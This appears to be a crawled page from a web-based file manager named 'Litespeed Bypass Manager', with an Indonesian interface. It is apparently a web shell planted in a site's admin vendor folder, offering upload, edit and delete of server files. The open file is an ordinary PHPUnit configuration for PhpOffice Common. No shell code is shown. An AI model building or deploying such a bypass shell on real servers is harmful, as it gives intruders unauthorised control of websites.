Litespeed Bypass Manager
Direktori:
/admin/vendor/phpoffice/common
⬆️ Kembali
Buat Folder Baru
Buat Folder
Upload File
Upload
⚠️ Litespeed Uploader
Isi Folder
📁
src
Folder
Hapus
📁
tests
Folder
Hapus
📄 .gitignore
Edit
Hapus
📄 .scrutinizer.yml
Edit
Hapus
📄 .travis.yml
Edit
Hapus
📄 .travis_shell_after_success.sh
Edit
Hapus
📄 CHANGELOG.md
Edit
Hapus
📄 COPYING
Edit
Hapus
📄 COPYING.LESSER
Edit
Hapus
📄 LICENSE
Edit
Hapus
📄 README.md
Edit
Hapus
📄 VERSION
Edit
Hapus
📄 composer.json
Edit
Hapus
📄 phpmd.xml.dist
Edit
Hapus
📄 phpunit.xml.dist
Edit
Hapus
Edit File: phpunit.xml.dist
<phpunit backupGlobals="false" backupStaticAttributes="false" bootstrap="./tests/bootstrap.php" colors="true" convertErrorsToExceptions="true" convertNoticesToExceptions="true" convertWarningsToExceptions="true" processIsolation="false" stopOnFailure="false"> <testsuites> <testsuite name="PhpOffice Common Test Suite"> <directory>./tests/Common</directory> </testsuite> </testsuites> <filter> <whitelist> <directory suffix=".php">./src</directory> </whitelist> </filter> <logging> <log type="coverage-html" target="./build/coverage" /> <log type="coverage-clover" target="./build/logs/clover.xml" /> </logging> </phpunit>
Simpan
Catatan: Mengedit file biner tidak disarankan.